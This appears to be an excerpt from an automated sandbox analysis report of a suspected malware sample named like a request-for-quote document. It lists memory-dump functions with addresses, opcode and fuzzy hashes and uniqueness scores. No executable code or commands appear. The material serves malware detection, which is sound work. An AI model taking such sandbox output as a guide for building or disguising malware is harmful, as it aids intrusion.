                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0a5227ca84b98abd74d40adb96ed323616a71f4a5e8f939ded6c2e86797af4e
                                                                                      • Instruction ID: 17ee27d3a0895108afac972eab6897dfabca92fba2625145e5c967dec8777bca
                                                                                      • Opcode Fuzzy Hash: e0a5227ca84b98abd74d40adb96ed323616a71f4a5e8f939ded6c2e86797af4e
                                                                                      • Instruction Fuzzy Hash: 3501A9B0304685DBF323973CCD4DF6537A8BB54B48F484555BB059BAF6D778D4018610
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0146437C Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                      • Instruction ID: 3fcedc81a6511a27a55a247174387435151ad4e1443b49f64a7e0d26af619683
                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                      • Instruction Fuzzy Hash: 22F02E75341E1347EF35AA2E9410B2FAA9E9FA0D08B0D052F9605CB7A0DF30DC91C781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0147F3E6 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9060ecfef633c65edae393dec3838a63374dac929e9d56712dd98f7f39e8fdc2
                                                                                      • Instruction ID: 8089cf5d33b855935c4cdd81369ff84ec49d94a5ce4bdd45a0adaf27289b54c0
                                                                                      • Opcode Fuzzy Hash: 9060ecfef633c65edae393dec3838a63374dac929e9d56712dd98f7f39e8fdc2
                                                                                      • Instruction Fuzzy Hash: 87F04F71E01249AFCB04EFAAD545A9EBBF4FF18300F40406AB945EB391D674DA01CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013B92FF Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ebea105eba5073d7cb664f7a215f06ff193f9515cc688bace4b4358e3b98c92
                                                                                      • Instruction ID: 84bec0e99124a4f515c42ee28c99ed942793aaee91189987fa1f380f282aa22c
                                                                                      • Opcode Fuzzy Hash: 8ebea105eba5073d7cb664f7a215f06ff193f9515cc688bace4b4358e3b98c92
                                                                                      • Instruction Fuzzy Hash: 47F0F072100640ABD7319B09DC04F9ABBEDEF84708F18051CA64683590D6A1E908C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014955C9 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 06caa1a3f2dec6ec160dd09d0432e719ca31800f898ffadaba8c9160896ea8b1
                                                                                      • Instruction ID: 685ba4714fb4557e504536131b4607bc2172532221622f9e09d8ded9b5d18ece
                                                                                      • Opcode Fuzzy Hash: 06caa1a3f2dec6ec160dd09d0432e719ca31800f898ffadaba8c9160896ea8b1
                                                                                      • Instruction Fuzzy Hash: 95F03CB5A01249AFDB04EFAAE545E9EBBF4EF18300F10446AB909EB390D674DA00CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01480115 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c22a148f2d24915eeb8d38728f23d9b6d5f13e1f39932055084c33990947ed1
                                                                                      • Instruction ID: ed57e71850dfda7fc3dea5e469b476be7def5edc693c3a955484a832e923be5b
                                                                                      • Opcode Fuzzy Hash: 5c22a148f2d24915eeb8d38728f23d9b6d5f13e1f39932055084c33990947ed1
                                                                                      • Instruction Fuzzy Hash: BCF0A7664256810BDF327B2C68D02DA7B55A761120F1A144BE4A157339C6758887C324
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0149539D Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54f49cc0ce11594647996951c34b725536e18805eb5e5c5796cc588f8565144f
                                                                                      • Instruction ID: c17da1d99a54ca638664bc67e638f9564562ba23bf2a49792f200235faeb29ac
                                                                                      • Opcode Fuzzy Hash: 54f49cc0ce11594647996951c34b725536e18805eb5e5c5796cc588f8565144f
                                                                                      • Instruction Fuzzy Hash: 70F05470A1424D9FDB15EF7AD545F5EBBB4EF14304F10806AE501EB291DA74D9018B14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014952E2 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b6af8865656d0c5a5a9bab47dfcf6219d479219abf13257e6f80d020d7d54d4
                                                                                      • Instruction ID: 8a30449d860e60c1a58a805c2e74cba313e80e253d74d826f7602e400d22f77a
                                                                                      • Opcode Fuzzy Hash: 8b6af8865656d0c5a5a9bab47dfcf6219d479219abf13257e6f80d020d7d54d4
                                                                                      • Instruction Fuzzy Hash: CEF0E270A10249AFDB14EFBAE541E6EBBF4FF24304F14406AA901EB3E0EA74D900CB14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01495283 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fc579629dfc90986558a674dc48d934d6dc74583b8dbeee6aa9945f97d035c2
                                                                                      • Instruction ID: bd0b1e76c7a4cbb8078195044d031117e87356f334a074de1bb7bc2b44a20b3b
                                                                                      • Opcode Fuzzy Hash: 6fc579629dfc90986558a674dc48d934d6dc74583b8dbeee6aa9945f97d035c2
                                                                                      • Instruction Fuzzy Hash: 6DF0B470A102099FDB04EFAAD501E6E77F4FF14300F1044AAB901EB3D1EA34D9008B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FC5ED Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9872a27a3bdf0f0d781f4a03ad67a3c792d35f75e0c8e69e656e4d5f28ade26c
                                                                                      • Instruction ID: 7330c2b8896abb237bd1b6e13318ced4165d5fd758f234607901ab2104614e47
                                                                                      • Opcode Fuzzy Hash: 9872a27a3bdf0f0d781f4a03ad67a3c792d35f75e0c8e69e656e4d5f28ade26c
                                                                                      • Instruction Fuzzy Hash: 55F0E2715996599FEB22971CC148F517BD8AB04BBCF0CB43ED68687612C264E881CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014951CB Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed921e4d109f0688d6e7b1064b9faeb2ad5fcb40af6d66ed31483ef5f2467092
                                                                                      • Instruction ID: 8d25470a587ab7782b3233c5596a60820d302663b301055b18f72f377fc42dcb
                                                                                      • Opcode Fuzzy Hash: ed921e4d109f0688d6e7b1064b9faeb2ad5fcb40af6d66ed31483ef5f2467092
                                                                                      • Instruction Fuzzy Hash: 37F082B0A15249AFDB15EBBAD505E6E77B4FF14304F14006ABA01EB2E0EA74D901CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0143D070 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction ID: 91a2c658c25b8c038bb38b07f50ccd17d8081f349390a8ff80292dbfdf40f032
                                                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction Fuzzy Hash: 30F0E57350461467C231AA4E8C05F5BFBACDBE5B70F10032ABA249B1E0DA70E911C7D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01495341 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c3a2c3a9990de5320447b533b4084daaf4a0b10c6a1b656570bebeac631b784
                                                                                      • Instruction ID: e876c90f11e2c58458142e086cb22911543c1017075799784a09d88d48499ee1
                                                                                      • Opcode Fuzzy Hash: 8c3a2c3a9990de5320447b533b4084daaf4a0b10c6a1b656570bebeac631b784
                                                                                      • Instruction Fuzzy Hash: 1BF02770A04209AFCF04DBBAD445E9E7BF4EF59304F10006AE501EB3E0EA34DD008714
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F7208 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 21a1759050176ef6e209f64a869bf49e205c8bafe4af25d709b2bf2679375793
                                                                                      • Instruction ID: 0981dd17396ede8df71f5c76c27ccfc92343b6df0614209b4cdbfcc478299b48
                                                                                      • Opcode Fuzzy Hash: 21a1759050176ef6e209f64a869bf49e205c8bafe4af25d709b2bf2679375793
                                                                                      • Instruction Fuzzy Hash: 11F08272D166A59FDB22D71CC184B9377D89B88674F1D4566D6098BBB2C338D840C650
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01495227 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b9c657a658f2577582644a5741afeab7acf41bbb9424bda2942021a84ceee48
                                                                                      • Instruction ID: 489783f0ff8f2797e52cbedadd263cca3dc591a77e476b2a1921242121936dca
                                                                                      • Opcode Fuzzy Hash: 8b9c657a658f2577582644a5741afeab7acf41bbb9424bda2942021a84ceee48
                                                                                      • Instruction Fuzzy Hash: 13F0E270A15209AFDB14EBAAE501E6E77B4EF14304F1400AABA01EB2E0EA30D9018B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0149547F Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d40c40b3ea2dc66c6c00f941227ad3b7b723a398a115b9aa5b31b7e21045a6ec
                                                                                      • Instruction ID: a85ceb671fc139dc6ee8a73c57e5886567fa356792f7dc41538f43ff4f7ecc0b
                                                                                      • Opcode Fuzzy Hash: d40c40b3ea2dc66c6c00f941227ad3b7b723a398a115b9aa5b31b7e21045a6ec
                                                                                      • Instruction Fuzzy Hash: B9F08270A01249AFDB15DBAAE945F9E7BB4EF18304F14006AE601EB3D0EA34D9018754
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01456030 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                      • Instruction ID: cbd12bb1c6520d8b27944b29049ddf110ec4ffb48b43e1201ca7d2c6e6ac7189
                                                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                      • Instruction Fuzzy Hash: 26F030B21042049FE361DF09D944F52B7F8EB05765F86C026EA099B662D379EC40CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F55C0 Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction ID: 6de604fa3e4f35a77a470ffdf6a674c577b173a6888e001e1f3c32d6047e3a30
                                                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction Fuzzy Hash: 13E0E533544614EBC6211E1BD808F12BB69FFA07B0F10412AA259579E08774AC11CAD4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C25E0 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7e3c0d5cca86f78c8d54069a055eacbc7e469ef0afe87ceb2fa317594a26ee80
                                                                                      • Instruction ID: 5bc62325df408edf826e335f28f97ab9804df5a905282248d70238eb2b051a88
                                                                                      • Opcode Fuzzy Hash: 7e3c0d5cca86f78c8d54069a055eacbc7e469ef0afe87ceb2fa317594a26ee80
                                                                                      • Instruction Fuzzy Hash: E9E09272100A549BC722BF2EDD15F8B77AAEB60768F014529F115571A0CA74AD10C794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01444000 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                      • Instruction ID: 83a82135fe74acc0c8aff6ded515d896fb97747dcea493a24858ec6a041e9919
                                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                      • Instruction Fuzzy Hash: EFE0AE743002058BE715CF19C040B627BA6BFD5A10F28C069A9488F305EB32A8528A40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0147B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction ID: 2f23c324f3fb76511b4135772a1721e5b105ad8513bd4e27919aa9a0062d5947
                                                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction Fuzzy Hash: D4E0C232284615BBDB222A58CC00FA97B15EB50BA4F104032FB086BAA1C675AC92D7D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013B823B Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                      • Instruction ID: 5cca1061ad1d342d11748311a66c22a520c55e84446b02be16beb9b211678cb0
                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                      • Instruction Fuzzy Hash: 6BE08631400915DEDB323F17DC44F9176B9FBA4B14F14486AE2410A8F497B45C81CA44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C2050 Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 033a8093c63309c43a65d6894d6b63bff4902d8038a32fdfe455dca24308dddd
                                                                                      • Instruction ID: 86b5ebcc89e942cc19f782df477f884c9c70f2f4432a7433759310d3a3eac99a
                                                                                      • Opcode Fuzzy Hash: 033a8093c63309c43a65d6894d6b63bff4902d8038a32fdfe455dca24308dddd
                                                                                      • Instruction Fuzzy Hash: A5E0C2331005606BC711FB5DED50F8A739EEFA4674F010125F155872A0CA64BC00C794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014492BC Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b0d802c1b0aa9100fbf7c68a379b77d0cf15c8777bc51ea925a1098ec4127e45
                                                                                      • Instruction ID: 6aaafcfd515d55f654d052e828716e99c41c7358fd4dbba8ba0873b7e9d558d7
                                                                                      • Opcode Fuzzy Hash: b0d802c1b0aa9100fbf7c68a379b77d0cf15c8777bc51ea925a1098ec4127e45
                                                                                      • Instruction Fuzzy Hash: 49F0E534251B80CFF72ADF08C1E1B5277B9FB9AB44F500459D4468BBB5C73AA942DB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BB562 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction ID: a1433eb3ed1cd1facf3de59ef1ce622a4ca633c70b23960ade15d7ce61e71841
                                                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction Fuzzy Hash: F5D02B31060610EFC7312F1AED04F827A71AF90B04F0400197201168F09960DC44C691
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FE59C Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                      • Instruction ID: 44c5a566dfe6b5390129d85c3dd3c3af005ecd8d29f6d3191a9cedcca0af8937
                                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                      • Instruction Fuzzy Hash: 13D0A933204A20ABDB32AB1CFC00FC333E8BB88724F16085AB008C7160C3A0AC81CA84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                      • Instruction ID: 12e1b29eee10e41faf6ab10de027b822a98828f95f18b18429276b53fd75a617
                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                      • Instruction Fuzzy Hash: 26D0123321647197DF29575A6954FA77919EB81A98F1A006D760A93D00C5158C42D6E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D02A0 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                      • Instruction ID: a4797847d5416402c7e4d7d9a8f3a71868191f8eacc16ba822bfb71f40e47f97
                                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                      • Instruction Fuzzy Hash: 1FD09236612E80CFD61BCB0DC5A4B1533A4BB84E48F8504A0E401CBB22D628D980CA00
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0144930B Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
